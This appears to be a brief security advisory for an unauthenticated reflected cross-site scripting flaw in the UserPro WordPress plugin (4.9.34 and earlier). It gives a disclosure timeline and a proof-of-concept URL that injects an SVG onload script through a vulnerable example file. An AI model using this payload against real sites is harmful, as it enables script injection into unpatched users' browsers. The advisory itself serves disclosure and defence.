UserPro <= 4.9.34 - Unauthenticated Reflected XSS

Description

Edit (WPscanTeam):

August 26th, 2019 - Envato Notified

September 2nd, 2019 - v4.9.34 released, still vulnerable

September 24th, 2019 - v4.9.35 and 4.9.35.1 released, fixing the issue

Proof of Concept

/wp-content/plugins/userpro/lib/instagram/vendor/cosenary/instagram/example/success.php?error=&error_description=%3Csvg/onload=alert(/XSS/)%3E